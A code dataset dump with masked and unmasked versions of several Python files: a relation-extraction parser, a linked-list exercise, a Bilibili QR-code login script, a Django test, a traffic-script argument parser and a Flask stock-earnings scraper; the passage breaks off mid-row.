if DPHelper.is_proper_noun(subj) and DPHelper.is_proper_noun(obj):
logging.log(INFO,
'============ Rooted NNP SUBJECT and NNP OBJECT =============')
subjs = get_all_nouns(subj, proper_noun=True)
objs = [get_noun_phrase(obj, proper_noun=True)]
aux_relations = sub_obj_vbroot(root)
relations = relations + create_relations(subjs, aux_relations, objs
)
open_comp: List[Dict] = DPHelper.get_child_type(root, Relations
.OPEN_CLAUSAL_COMPLEMENT)
comp: List[Dict] = DPHelper.get_child_type(root, Relations.
CLAUSAL_COMPLEMENT)
if open_comp:
subjs = [get_noun_phrase(obj, proper_noun=True)]
objs, xcomp_relations = x_comp(open_comp[0])
relations = relations + create_relations(subjs,
xcomp_relations, objs)
elif subj is not None and DPHelper.is_proper_noun(subj):
subjs = get_all_nouns(subj, proper_noun=True)
appos_rels, appos_objs = [], []
appos_rel_objs = []
for appos in DPHelper.get_child_type(subj, Relations.APPOSITION):
a_objs, a_relations = direct_appositional_relations(appos)
relations += create_nested_relations(subjs, a_relations, a_objs)
if DPHelper.get_child_type(root, Relations.CLAUSAL_COMPLEMENT):
pass
if DPHelper.is_proper_noun(subj) and subj['link'
] == Relations.PASSIVE_NOM_SUBJECT:
logging.log(INFO,
'============= NNP PASSIVE SUBJECT ===============')
objs, aux_relations, appos = subjpass(root)
for appos_instance in appos:
relations = relations + create_relations(subjs,
appos_instance['relation'], appos_instance['obj'])
relations = relations + create_relations(subjs, aux_relations, objs
)
elif DPHelper.is_noun(root):
logging.log(INFO,
'============= NNP SUBJECT with NOUN ROOT ===============')
objs, aux_relations = nnroot_subj(root)
relations = relations + create_relations(subjs, aux_relations, objs
)
elif DPHelper.is_verb(root) and obj is not None:
logging.log(INFO,
'============= NNP SUBJECT with VERB ROOT (NON-NNP DOBJ present) ==============='
)
objs, aux_relations = vbroot_subj_xobj(root)
relations = relations + create_relations(subjs, aux_relations, objs
)
elif DPHelper.is_verb(root):
logging.log(INFO,
'============= NNP SUBJECT with VERB ROOT ===============')
objs, aux_relations = vbroot_subj(root)
relations = relations + create_nested_relations(subjs,
aux_relations, objs)
elif DPHelper.is_adjective(root):
logging.log(INFO,
'============= NNP SUBJECT with ADJ ROOT ===============')
objs, aux_relations = vbroot_subj(root)
relations = relations + create_nested_relations(subjs,
aux_relations, objs)
else:
logging.log(INFO,
'============= NNP SUBJECT with UNKNOWN STRUCTURE ==============='
)
else:
logging.log(INFO,
'============== NOUN ROOT - No Direct SUBJ and OBJ ================'
)
if subj is not None:
if subj['link'] == Relations.PASSIVE_NOM_SUBJECT:
logging.log(INFO,
'============= NESTED POSSESSIVE OF PASSIVE SUBJECT ==============='
)
subjs = subjpass_poss(subj)
if DPHelper.has_rc_modifier(root):
logging.log(INFO,
'============= RELATIVE CLAUSE MODIFIER PRESENT ==============='
)
if DPHelper.is_proper_noun(root):
subj, relations, objs = nnproot(root)
all_rel_tuples = []
for relation in relations:
rel_tuples = [(sub, relation['relation'], obj) for sub in relation[
'subjs'] for obj in relation['objs']]
all_rel_tuples += rel_tuples
return all_rel_tuples
| import logging
from logging import INFO
from typing import Dict, List
from .constants import Relations, POS
from .evaluator import *
from .general import DPHelper
from .general import *
from .utils import *
# ========================================= DRIVER =================================================
def generate(root: Dict):
# {"relation": <>, "subjs": [<>], "objs": [<>]}
relations: List[Dict] = []
# Is this applicable only to root?
subj = DPHelper.get_subject(root)
obj = DPHelper.get_object(root)
if subj is not None and DPHelper.is_proper_noun(subj) and \
obj is not None and DPHelper.is_proper_noun(obj):
if DPHelper.is_proper_noun(subj) and DPHelper.is_proper_noun(obj):
logging.log(INFO, "============ Rooted NNP SUBJECT and NNP OBJECT =============")
subjs = get_all_nouns(subj, proper_noun=True)
objs = [get_noun_phrase(obj, proper_noun=True)]
aux_relations = sub_obj_vbroot(root) # Relations between subject and object
relations = relations + create_relations(subjs, aux_relations, objs)
# Relations within clausal complements
open_comp: List[Dict] = DPHelper.get_child_type(root, Relations.OPEN_CLAUSAL_COMPLEMENT)
comp: List[Dict] = DPHelper.get_child_type(root, Relations.CLAUSAL_COMPLEMENT)
if open_comp: # Assume for now open_comps all relate to object
subjs = [get_noun_phrase(obj, proper_noun=True)]
objs, xcomp_relations = x_comp(open_comp[0]) # TODO Can there be multiple xcomps?
relations = relations + create_relations(subjs, xcomp_relations, objs)
elif subj is not None and DPHelper.is_proper_noun(subj):
subjs = get_all_nouns(subj, proper_noun=True)
appos_rels, appos_objs = [], []
# Find direct appositional relations within NSUBJ block
appos_rel_objs = []
for appos in DPHelper.get_child_type(subj, Relations.APPOSITION):
a_objs, a_relations = direct_appositional_relations(appos)
relations += create_nested_relations(subjs, a_relations, a_objs)
# TODO Check for clausal complement for Subj (INDEPENDENT)
if DPHelper.get_child_type(root, Relations.CLAUSAL_COMPLEMENT):
pass
# Passive subject, look into preposition for predicate object with possessive
if DPHelper.is_proper_noun(subj) and subj["link"] == Relations.PASSIVE_NOM_SUBJECT:
logging.log(INFO, "============= NNP PASSIVE SUBJECT ===============")
objs, aux_relations, appos = subjpass(root)
for appos_instance in appos:
relations = relations + create_relations(subjs, appos_instance["relation"], appos_instance["obj"])
relations = relations + create_relations(subjs, aux_relations, objs)
# Possible case where root is noun and hence subject is not labeled passive but relation still exists
elif DPHelper.is_noun(root):
logging.log(INFO, "============= NNP SUBJECT with NOUN ROOT ===============")
objs, aux_relations = nnroot_subj(root)
relations = relations + create_relations(subjs, aux_relations, objs)
# Usually the case that the direct obj being non-NNP represents relation
elif DPHelper.is_verb(root) and obj is not None:
logging.log(INFO, "============= NNP SUBJECT with VERB ROOT (NON-NNP DOBJ present) ===============")
objs, aux_relations = vbroot_subj_xobj(root)
relations = relations + create_relations(subjs, aux_relations, objs)
# Root verb without concrete noun form but valid relation (E.g. lives, resides) TODO Do we require `in/from etc.` for preposition?
elif DPHelper.is_verb(root):
logging.log(INFO, "============= NNP SUBJECT with VERB ROOT ===============")
objs, aux_relations = vbroot_subj(root)
relations = relations + create_nested_relations(subjs, aux_relations, objs)
elif DPHelper.is_adjective(root):
logging.log(INFO, "============= NNP SUBJECT with ADJ ROOT ===============")
objs, aux_relations = vbroot_subj(root) # FIXME We assume this is similar to verb root for now
relations = relations + create_nested_relations(subjs, aux_relations, objs)
else:
logging.log(INFO, "============= NNP SUBJECT with UNKNOWN STRUCTURE ===============")
else:
logging.log(INFO, "============== NOUN ROOT - No Direct SUBJ and OBJ ================")
if subj is not None: # Mostly likely noun with possessive or nested
if (subj["link"] == Relations.PASSIVE_NOM_SUBJECT): # Necessarily assume this since noun subj is possessive, else should Corefer
logging.log(INFO, "============= NESTED POSSESSIVE OF PASSIVE SUBJECT ===============")
subjs = subjpass_poss(subj)
if DPHelper.has_rc_modifier(root): # NNP still might be present in rc modifier
logging.log(INFO, "============= RELATIVE CLAUSE MODIFIER PRESENT ===============")
if DPHelper.is_proper_noun(root):
subj, relations, objs = nnproot(root)
all_rel_tuples = []
for relation in relations:
rel_tuples = [(sub, relation['relation'], obj) for sub in relation['subjs'] for obj in relation['objs']]
all_rel_tuples += rel_tuples
return all_rel_tuples
| null | [
0,
1,
2,
3
] |
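# --- Added example (not part of the dataset row above) ---
# Toy illustration of the final flattening step in generate(): each relation
# dict expands into (subject, relation, object) tuples via the cartesian
# product of its subjs and objs lists. The data below is invented.
relations = [{'relation': 'works_for', 'subjs': ['Alice', 'Bob'], 'objs': ['Acme']}]
all_rel_tuples = []
for relation in relations:
    all_rel_tuples += [(sub, relation['relation'], obj)
                       for sub in relation['subjs'] for obj in relation['objs']]
print(all_rel_tuples)  # [('Alice', 'works_for', 'Acme'), ('Bob', 'works_for', 'Acme')]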
1,636 | 75990147e4a3dae1b590729ed659e2ddcbfb295d | ## More Review + More Linked Lists ##
##Given a pointer to the head node of a linked list whose data elements are in non-decreasing order, you must delete any duplicate nodes and print the updated list.
##Code handling I/O is provided in the editor. Complete the removeDuplicates(Node) function.
##Note: The head pointer may be null, indicating that the list is empty. Be sure to reset your next pointer when performing deletions to avoid breaking the list.
##Input Format
##The first line contains N, the number of nodes to be inserted.
##The N subsequent lines each contain an integer describing the data for a node being inserted at the list's tail;
##the lines of data will always be in non-decreasing order.
##Output Format
##Print the data for your list of ascending nodes as a single line of space-separated integers.
##Sample Input
##6
##1
##2
##2
##3
##3
##4
##Sample Output
##1 2 3 4
##Explanation
##N = 6, and our non-decreasing list is {1,2,2,3,3,4}. The data values 2 and 3 each have a duplicate,
##so we remove the two duplicate nodes and print our updated (ascending) list.
class Node:
def __init__(self,data):
self.data = data
self.next = None
class Solution:
def insert(self,head,data):
p = Node(data)
if head==None:
head=p
elif head.next==None:
head.next=p
else:
start=head
while(start.next!=None):
start=start.next
start.next=p
return head
def display(self,head):
current = head
while current:
print current.data,
current = current.next
def removeDuplicates(self,head): ########
if head==None or head.next ==None: return head
tmp = head;
while tmp.next!=None:
if tmp.data==tmp.next.data: tmp.next=tmp.next.next;
else: tmp=tmp.next;
return head
mylist= Solution()
T=int(input())
head=None
for i in range(T):
data=int(input())
head=mylist.insert(head,data)
head=mylist.removeDuplicates(head)
mylist.display(head);
| null | null | null | null | [
0
] |
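# --- Added example (not part of the dataset row above) ---
# Python 3 port of the solution above (the record is Python 2; note the
# `print current.data,` statement form), with a quick inline check.
class Node:
    def __init__(self, data):
        self.data = data
        self.next = None

def remove_duplicates(head):
    current = head
    while current is not None and current.next is not None:
        if current.data == current.next.data:
            current.next = current.next.next  # unlink the duplicate node
        else:
            current = current.next
    return head

head = Node(1)
head.next = Node(2)
head.next.next = Node(2)
head.next.next.next = Node(3)
remove_duplicates(head)
values, node = [], head
while node:
    values.append(str(node.data))
    node = node.next
print(' '.join(values))  # 1 2 3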
1,637 | c268c61e47698d07b7c1461970dc47242af55777 | <mask token>
class showpng(Thread):
def __init__(self, data):
Thread.__init__(self)
self.data = data
def run(self):
img = Image.open(BytesIO(self.data))
img.show()
def islogin(session):
try:
session.cookies.load(ignore_discard=True)
except Exception:
pass
loginurl = session.get('https://api.bilibili.com/x/web-interface/nav',
verify=False, headers=headers).json()
if loginurl['code'] == 0:
print('Cookies值有效,', loginurl['data']['uname'], ',已登录!')
return session, True
else:
print('Cookies值已经失效,请重新扫码登录!')
return session, False
<mask token>
| <mask token>
class showpng(Thread):
def __init__(self, data):
Thread.__init__(self)
self.data = data
def run(self):
img = Image.open(BytesIO(self.data))
img.show()
def islogin(session):
try:
session.cookies.load(ignore_discard=True)
except Exception:
pass
loginurl = session.get('https://api.bilibili.com/x/web-interface/nav',
verify=False, headers=headers).json()
if loginurl['code'] == 0:
print('Cookies值有效,', loginurl['data']['uname'], ',已登录!')
return session, True
else:
print('Cookies值已经失效,请重新扫码登录!')
return session, False
def bzlogin():
if not os.path.exists('bzcookies.txt'):
with open('bzcookies.txt', 'w') as f:
f.write('')
session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename='bzcookies.txt')
session, status = islogin(session)
if not status:
getlogin = session.get(
'https://passport.bilibili.com/qrcode/getLoginUrl', headers=headers
).json()
loginurl = requests.get(getlogin['data']['url'], headers=headers).url
oauthKey = getlogin['data']['oauthKey']
qr = qrcode.QRCode()
qr.add_data(loginurl)
img = qr.make_image()
a = BytesIO()
img.save(a, 'png')
png = a.getvalue()
a.close()
base64_data = base64.b64encode(png)
print(base64_data)
"""
t = showpng(png)
t.start()
tokenurl = 'https://passport.bilibili.com/qrcode/getLoginInfo'
while 1:
qrcodedata = session.post(tokenurl, data={'oauthKey': oauthKey, 'gourl': 'https://www.bilibili.com/'}, headers=headerss).json()
print(qrcodedata)
if '-4' in str(qrcodedata['data']):
print('二维码未失效,请扫码!')
elif '-5' in str(qrcodedata['data']):
print('已扫码,请确认!')
elif '-2' in str(qrcodedata['data']):
print('二维码已失效,请重新运行!')
elif 'True' in str(qrcodedata['status']):
print('已确认,登入成功!')
session.get(qrcodedata['data']['url'], headers=headers)
break
else:
print('其他:', qrcodedata)
time.sleep(2)
session.cookies.save()
return session
"""
<mask token>
| <mask token>
requests.packages.urllib3.disable_warnings()
ua = UserAgent(path='ua.json')
user_agent = ua.chrome
headers = {'User-Agent': user_agent, 'Referer': 'https://www.bilibili.com/'}
headerss = {'User-Agent': user_agent, 'Host': 'passport.bilibili.com',
'Referer': 'https://passport.bilibili.com/login'}
class showpng(Thread):
def __init__(self, data):
Thread.__init__(self)
self.data = data
def run(self):
img = Image.open(BytesIO(self.data))
img.show()
def islogin(session):
try:
session.cookies.load(ignore_discard=True)
except Exception:
pass
loginurl = session.get('https://api.bilibili.com/x/web-interface/nav',
verify=False, headers=headers).json()
if loginurl['code'] == 0:
print('Cookies值有效,', loginurl['data']['uname'], ',已登录!')
return session, True
else:
print('Cookies值已经失效,请重新扫码登录!')
return session, False
def bzlogin():
if not os.path.exists('bzcookies.txt'):
with open('bzcookies.txt', 'w') as f:
f.write('')
session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename='bzcookies.txt')
session, status = islogin(session)
if not status:
getlogin = session.get(
'https://passport.bilibili.com/qrcode/getLoginUrl', headers=headers
).json()
loginurl = requests.get(getlogin['data']['url'], headers=headers).url
oauthKey = getlogin['data']['oauthKey']
qr = qrcode.QRCode()
qr.add_data(loginurl)
img = qr.make_image()
a = BytesIO()
img.save(a, 'png')
png = a.getvalue()
a.close()
base64_data = base64.b64encode(png)
print(base64_data)
"""
t = showpng(png)
t.start()
tokenurl = 'https://passport.bilibili.com/qrcode/getLoginInfo'
while 1:
qrcodedata = session.post(tokenurl, data={'oauthKey': oauthKey, 'gourl': 'https://www.bilibili.com/'}, headers=headerss).json()
print(qrcodedata)
if '-4' in str(qrcodedata['data']):
print('二维码未失效,请扫码!')
elif '-5' in str(qrcodedata['data']):
print('已扫码,请确认!')
elif '-2' in str(qrcodedata['data']):
print('二维码已失效,请重新运行!')
elif 'True' in str(qrcodedata['status']):
print('已确认,登入成功!')
session.get(qrcodedata['data']['url'], headers=headers)
break
else:
print('其他:', qrcodedata)
time.sleep(2)
session.cookies.save()
return session
"""
if __name__ == '__main__':
bzlogin()
| import qrcode
from fake_useragent import UserAgent
from threading import Thread
import time, base64
import requests
from io import BytesIO
import http.cookiejar as cookielib
from PIL import Image
import os
requests.packages.urllib3.disable_warnings()
ua = UserAgent(path='ua.json')
user_agent = ua.chrome
headers = {'User-Agent': user_agent, 'Referer': 'https://www.bilibili.com/'}
headerss = {'User-Agent': user_agent, 'Host': 'passport.bilibili.com',
'Referer': 'https://passport.bilibili.com/login'}
class showpng(Thread):
def __init__(self, data):
Thread.__init__(self)
self.data = data
def run(self):
img = Image.open(BytesIO(self.data))
img.show()
def islogin(session):
try:
session.cookies.load(ignore_discard=True)
except Exception:
pass
loginurl = session.get('https://api.bilibili.com/x/web-interface/nav',
verify=False, headers=headers).json()
if loginurl['code'] == 0:
print('Cookies值有效,', loginurl['data']['uname'], ',已登录!')
return session, True
else:
print('Cookies值已经失效,请重新扫码登录!')
return session, False
def bzlogin():
if not os.path.exists('bzcookies.txt'):
with open('bzcookies.txt', 'w') as f:
f.write('')
session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename='bzcookies.txt')
session, status = islogin(session)
if not status:
getlogin = session.get(
'https://passport.bilibili.com/qrcode/getLoginUrl', headers=headers
).json()
loginurl = requests.get(getlogin['data']['url'], headers=headers).url
oauthKey = getlogin['data']['oauthKey']
qr = qrcode.QRCode()
qr.add_data(loginurl)
img = qr.make_image()
a = BytesIO()
img.save(a, 'png')
png = a.getvalue()
a.close()
base64_data = base64.b64encode(png)
print(base64_data)
"""
t = showpng(png)
t.start()
tokenurl = 'https://passport.bilibili.com/qrcode/getLoginInfo'
while 1:
qrcodedata = session.post(tokenurl, data={'oauthKey': oauthKey, 'gourl': 'https://www.bilibili.com/'}, headers=headerss).json()
print(qrcodedata)
if '-4' in str(qrcodedata['data']):
print('二维码未失效,请扫码!')
elif '-5' in str(qrcodedata['data']):
print('已扫码,请确认!')
elif '-2' in str(qrcodedata['data']):
print('二维码已失效,请重新运行!')
elif 'True' in str(qrcodedata['status']):
print('已确认,登入成功!')
session.get(qrcodedata['data']['url'], headers=headers)
break
else:
print('其他:', qrcodedata)
time.sleep(2)
session.cookies.save()
return session
"""
if __name__ == '__main__':
bzlogin()
| # -*- coding: utf-8 -*-
# single-file QR-code login script, adapted from another project
import qrcode
from fake_useragent import UserAgent
from threading import Thread
import time, base64
import requests
from io import BytesIO
import http.cookiejar as cookielib
from PIL import Image
import os
requests.packages.urllib3.disable_warnings()
ua = UserAgent(path='ua.json')
user_agent = ua.chrome
headers = {'User-Agent': user_agent, 'Referer': "https://www.bilibili.com/"}
headerss = {'User-Agent': user_agent, 'Host': 'passport.bilibili.com','Referer': "https://passport.bilibili.com/login"}
class showpng(Thread):
def __init__(self, data):
Thread.__init__(self)
self.data = data
def run(self):
img = Image.open(BytesIO(self.data))
img.show()
def islogin(session):
try:
session.cookies.load(ignore_discard=True)
except Exception:
pass
loginurl = session.get("https://api.bilibili.com/x/web-interface/nav", verify=False, headers=headers).json()
if loginurl['code'] == 0:
print('Cookies值有效,',loginurl['data']['uname'],',已登录!')
return session, True
else:
print('Cookies值已经失效,请重新扫码登录!')
return session, False
def bzlogin():
if not os.path.exists('bzcookies.txt'):
with open("bzcookies.txt", 'w') as f:
f.write("")
session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename='bzcookies.txt')
session, status = islogin(session)
if not status:
getlogin = session.get('https://passport.bilibili.com/qrcode/getLoginUrl', headers=headers).json()
loginurl = requests.get(getlogin['data']['url'], headers=headers).url
oauthKey = getlogin['data']['oauthKey']
qr = qrcode.QRCode()
qr.add_data(loginurl)
img = qr.make_image()
a = BytesIO()
img.save(a, 'png')
png = a.getvalue()
a.close()
        base64_data = base64.b64encode(png) # base64-encode the PNG bytes (an encoding, not encryption)
print(base64_data)
'''
t = showpng(png)
t.start()
tokenurl = 'https://passport.bilibili.com/qrcode/getLoginInfo'
while 1:
qrcodedata = session.post(tokenurl, data={'oauthKey': oauthKey, 'gourl': 'https://www.bilibili.com/'}, headers=headerss).json()
print(qrcodedata)
if '-4' in str(qrcodedata['data']):
print('二维码未失效,请扫码!')
elif '-5' in str(qrcodedata['data']):
print('已扫码,请确认!')
elif '-2' in str(qrcodedata['data']):
print('二维码已失效,请重新运行!')
elif 'True' in str(qrcodedata['status']):
print('已确认,登入成功!')
session.get(qrcodedata['data']['url'], headers=headers)
break
else:
print('其他:', qrcodedata)
time.sleep(2)
session.cookies.save()
return session
'''
if __name__ == '__main__':
bzlogin()
| [
4,
5,
7,
8,
9
] |
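# --- Added example (not part of the dataset row above) ---
# Standalone sketch of the cookie-persistence pattern used above: an
# LWPCookieJar attached to a requests.Session survives process restarts.
import http.cookiejar as cookielib
import requests

session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename='bzcookies.txt')
try:
    session.cookies.load(ignore_discard=True)   # reuse cookies from a prior run
except (FileNotFoundError, cookielib.LoadError):
    pass                                        # first run: nothing to load yet
# ... authenticate here ...
session.cookies.save(ignore_discard=True)       # persist for the next run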
1,638 | 824038a56e8aaf4adf6ec813a5728ab318547582 | <mask token>
| <mask token>
class TestCommon(TestCase):
<mask token>
| <mask token>
class TestCommon(TestCase):
def test_get_method_config(self):
job = create_test_job(predictive_model=create_test_predictive_model
(predictive_model=PredictiveModels.CLASSIFICATION.value,
prediction_method=ClassificationMethods.RANDOM_FOREST.value))
method, config = get_method_config(job)
self.assertEqual(ClassificationMethods.RANDOM_FOREST.value, method)
self.assertEqual({'max_depth': None, 'max_features': 'auto',
'n_estimators': 10}, config)
| <mask token>
from django.test import TestCase
from src.core.common import get_method_config
from src.predictive_model.classification.models import ClassificationMethods
from src.predictive_model.models import PredictiveModels
from src.utils.tests_utils import create_test_job, create_test_predictive_model
class TestCommon(TestCase):
def test_get_method_config(self):
job = create_test_job(predictive_model=create_test_predictive_model
(predictive_model=PredictiveModels.CLASSIFICATION.value,
prediction_method=ClassificationMethods.RANDOM_FOREST.value))
method, config = get_method_config(job)
self.assertEqual(ClassificationMethods.RANDOM_FOREST.value, method)
self.assertEqual({'max_depth': None, 'max_features': 'auto',
'n_estimators': 10}, config)
| """
common tests
"""
from django.test import TestCase
from src.core.common import get_method_config
from src.predictive_model.classification.models import ClassificationMethods
from src.predictive_model.models import PredictiveModels
from src.utils.tests_utils import create_test_job, create_test_predictive_model
class TestCommon(TestCase):
def test_get_method_config(self):
job = create_test_job(
predictive_model=create_test_predictive_model(
predictive_model=PredictiveModels.CLASSIFICATION.value,
prediction_method=ClassificationMethods.RANDOM_FOREST.value
)
)
method, config = get_method_config(job)
self.assertEqual(ClassificationMethods.RANDOM_FOREST.value, method)
self.assertEqual({
'max_depth': None,
'max_features': 'auto',
'n_estimators': 10,
}, config)
| [
0,
1,
2,
3,
4
] |
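# --- Added example (not part of the dataset row above) ---
# Hedged sketch of a get_method_config implementation that would satisfy the
# test; the real function lives in src.core.common and is not in this record,
# so the attribute names below are assumptions.
def get_method_config(job):
    model = job.predictive_model
    # assumed: the model stores the method name and its hyperparameter dict
    return model.prediction_method, model.config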
1,639 | ea6d726e8163ed0f93b8078323fa5f4e9115ad73 | <mask token>
class TrafficScriptArg:
<mask token>
<mask token>
def get_arg(self, arg_name):
"""Get argument value.
:param arg_name: Argument name.
:type arg_name: str
:returns: Argument value.
:rtype: str
"""
arg_val = self._args.get(arg_name)
if arg_val is None:
raise Exception(f"Argument '{arg_name}' not found")
return arg_val
| <mask token>
class TrafficScriptArg:
<mask token>
def __init__(self, more_args=None, opt_args=None):
parser = argparse.ArgumentParser()
parser.add_argument(u'--tx_if', help=u'interface that sends traffic')
parser.add_argument(u'--rx_if', help=u'interface that receives traffic'
)
if more_args is not None:
for arg in more_args:
arg_name = f'--{arg}'
parser.add_argument(arg_name)
if opt_args is not None:
for arg in opt_args:
arg_name = f'--{arg}'
parser.add_argument(arg_name, nargs=u'?', default=u'')
self._parser = parser
self._args = vars(parser.parse_args())
def get_arg(self, arg_name):
"""Get argument value.
:param arg_name: Argument name.
:type arg_name: str
:returns: Argument value.
:rtype: str
"""
arg_val = self._args.get(arg_name)
if arg_val is None:
raise Exception(f"Argument '{arg_name}' not found")
return arg_val
| <mask token>
class TrafficScriptArg:
"""Traffic scripts argument parser.
Parse arguments for traffic script. Default has two arguments '--tx_if'
and '--rx_if'. You can provide more arguments. All arguments have string
representation of the value. You can add also optional arguments. Default
value for optional arguments is empty string.
:param more_args: List of additional arguments (optional).
:param opt_args: List of optional arguments (optional).
:type more_args: list
:type opt_args: list
:Example:
>>> from TrafficScriptArg import TrafficScriptArg
>>> args = TrafficScriptArg(['src_mac', 'dst_mac', 'src_ip', 'dst_ip'])
"""
def __init__(self, more_args=None, opt_args=None):
parser = argparse.ArgumentParser()
parser.add_argument(u'--tx_if', help=u'interface that sends traffic')
parser.add_argument(u'--rx_if', help=u'interface that receives traffic'
)
if more_args is not None:
for arg in more_args:
arg_name = f'--{arg}'
parser.add_argument(arg_name)
if opt_args is not None:
for arg in opt_args:
arg_name = f'--{arg}'
parser.add_argument(arg_name, nargs=u'?', default=u'')
self._parser = parser
self._args = vars(parser.parse_args())
def get_arg(self, arg_name):
"""Get argument value.
:param arg_name: Argument name.
:type arg_name: str
:returns: Argument value.
:rtype: str
"""
arg_val = self._args.get(arg_name)
if arg_val is None:
raise Exception(f"Argument '{arg_name}' not found")
return arg_val
| <mask token>
import argparse
class TrafficScriptArg:
"""Traffic scripts argument parser.
Parse arguments for traffic script. Default has two arguments '--tx_if'
and '--rx_if'. You can provide more arguments. All arguments have string
representation of the value. You can add also optional arguments. Default
value for optional arguments is empty string.
:param more_args: List of additional arguments (optional).
:param opt_args: List of optional arguments (optional).
:type more_args: list
:type opt_args: list
:Example:
>>> from TrafficScriptArg import TrafficScriptArg
>>> args = TrafficScriptArg(['src_mac', 'dst_mac', 'src_ip', 'dst_ip'])
"""
def __init__(self, more_args=None, opt_args=None):
parser = argparse.ArgumentParser()
parser.add_argument(u'--tx_if', help=u'interface that sends traffic')
parser.add_argument(u'--rx_if', help=u'interface that receives traffic'
)
if more_args is not None:
for arg in more_args:
arg_name = f'--{arg}'
parser.add_argument(arg_name)
if opt_args is not None:
for arg in opt_args:
arg_name = f'--{arg}'
parser.add_argument(arg_name, nargs=u'?', default=u'')
self._parser = parser
self._args = vars(parser.parse_args())
def get_arg(self, arg_name):
"""Get argument value.
:param arg_name: Argument name.
:type arg_name: str
:returns: Argument value.
:rtype: str
"""
arg_val = self._args.get(arg_name)
if arg_val is None:
raise Exception(f"Argument '{arg_name}' not found")
return arg_val
| # Copyright (c) 2021 Cisco and/or its affiliates.
#
# SPDX-License-Identifier: Apache-2.0 OR GPL-2.0-or-later
#
# Licensed under the Apache License 2.0 or
# GNU General Public License v2.0 or later; you may not use this file
# except in compliance with one of these Licenses. You
# may obtain a copy of the Licenses at:
#
# http://www.apache.org/licenses/LICENSE-2.0
# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html
#
# Note: If this file is linked with Scapy, which is GPLv2+, your use of it
# must be under GPLv2+. If at any point in the future it is no longer linked
# with Scapy (or other GPLv2+ licensed software), you are free to choose
# Apache 2.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Traffic scripts argument parser library."""
import argparse
class TrafficScriptArg:
"""Traffic scripts argument parser.
Parse arguments for traffic script. Default has two arguments '--tx_if'
and '--rx_if'. You can provide more arguments. All arguments have string
representation of the value. You can add also optional arguments. Default
value for optional arguments is empty string.
:param more_args: List of additional arguments (optional).
:param opt_args: List of optional arguments (optional).
:type more_args: list
:type opt_args: list
:Example:
>>> from TrafficScriptArg import TrafficScriptArg
>>> args = TrafficScriptArg(['src_mac', 'dst_mac', 'src_ip', 'dst_ip'])
"""
def __init__(self, more_args=None, opt_args=None):
parser = argparse.ArgumentParser()
parser.add_argument(u"--tx_if", help=u"interface that sends traffic")
parser.add_argument(u"--rx_if", help=u"interface that receives traffic")
if more_args is not None:
for arg in more_args:
arg_name = f"--{arg}"
parser.add_argument(arg_name)
if opt_args is not None:
for arg in opt_args:
arg_name = f"--{arg}"
parser.add_argument(arg_name, nargs=u"?", default=u"")
self._parser = parser
self._args = vars(parser.parse_args())
def get_arg(self, arg_name):
"""Get argument value.
:param arg_name: Argument name.
:type arg_name: str
:returns: Argument value.
:rtype: str
"""
arg_val = self._args.get(arg_name)
if arg_val is None:
raise Exception(f"Argument '{arg_name}' not found")
return arg_val
| [
2,
3,
4,
5,
6
] |
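# --- Added example (not part of the dataset row above) ---
# Runnable usage sketch: argparse reads sys.argv, so a quick demo can inject
# arguments before constructing TrafficScriptArg (assumes the class from the
# record above is in scope).
import sys

sys.argv = ['script.py', '--tx_if', 'eth1', '--rx_if', 'eth2',
            '--src_mac', 'aa:bb:cc:dd:ee:ff']
args = TrafficScriptArg(['src_mac'], ['dst_mac'])
print(args.get_arg('tx_if'))          # eth1
print(args.get_arg('src_mac'))        # aa:bb:cc:dd:ee:ff
print(repr(args.get_arg('dst_mac')))  # '' -- optional args default to empty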
1,640 | 0058a6d3c9d4e600885b876614362ea4401ce2fe | <mask token>
| <mask token>
with open('src/time.txt', 'w') as f:
f.write(str(int(time.time())))
| import time
with open('src/time.txt', 'w') as f:
f.write(str(int(time.time())))
| import time
with open("src/time.txt", "w") as f:
f.write(str(int(time.time()))) | null | [
0,
1,
2,
3
] |
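# --- Added example (not part of the dataset row above) ---
# Companion sketch: reading the epoch timestamp back and converting it to a
# datetime, assuming src/time.txt was written by the snippet above.
from datetime import datetime

with open('src/time.txt') as f:
    ts = int(f.read().strip())
print(datetime.fromtimestamp(ts))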
1,641 | 3be1947ead65f8e8a9bf73cc8cae2c7d69d8b756 | <mask token>
@app.route('/')
def home_page():
with open('/Users/samfunk/ds/metis/project_mcnulty/stock_page.html', 'r'
) as viz_file:
return viz_file.read()
<mask token>
| <mask token>
@app.route('/')
def home_page():
with open('/Users/samfunk/ds/metis/project_mcnulty/stock_page.html', 'r'
) as viz_file:
return viz_file.read()
@app.route('/stock', methods=['POST'])
def stock(ok_tickers=ok_tickers()):
data = flask.request.json
ticker = str(data['ticker']).upper()
if ticker in ok_tickers:
earnings_soup = BeautifulSoup(requests.get(
'https://finance.yahoo.com/quote/%s/analysts?p=%s' % (ticker,
ticker)).text, 'html.parser')
surprise_string = earnings_soup.find_all('table')[2].tbody.find_all(
'tr')[3].find_all('td')[4].text
surprise = float(re.search('(.*)%', surprise_string)[1])
if abs(surprise) < 5.0:
score = 0
else:
score = 1
else:
surprise_string = 'null'
score = 'null'
results = {'surprise': surprise_string, 'score': score}
print(ticker, results)
return flask.jsonify(results)
if __name__ == '__main__':
app.run()
| <mask token>
app = flask.Flask(__name__)
@app.route('/')
def home_page():
with open('/Users/samfunk/ds/metis/project_mcnulty/stock_page.html', 'r'
) as viz_file:
return viz_file.read()
@app.route('/stock', methods=['POST'])
def stock(ok_tickers=ok_tickers()):
data = flask.request.json
ticker = str(data['ticker']).upper()
if ticker in ok_tickers:
earnings_soup = BeautifulSoup(requests.get(
'https://finance.yahoo.com/quote/%s/analysts?p=%s' % (ticker,
ticker)).text, 'html.parser')
surprise_string = earnings_soup.find_all('table')[2].tbody.find_all(
'tr')[3].find_all('td')[4].text
surprise = float(re.search('(.*)%', surprise_string)[1])
if abs(surprise) < 5.0:
score = 0
else:
score = 1
else:
surprise_string = 'null'
score = 'null'
results = {'surprise': surprise_string, 'score': score}
print(ticker, results)
return flask.jsonify(results)
if __name__ == '__main__':
app.run()
| import flask
import numpy as np
import pandas as pd
import requests
from bs4 import BeautifulSoup
import pickle
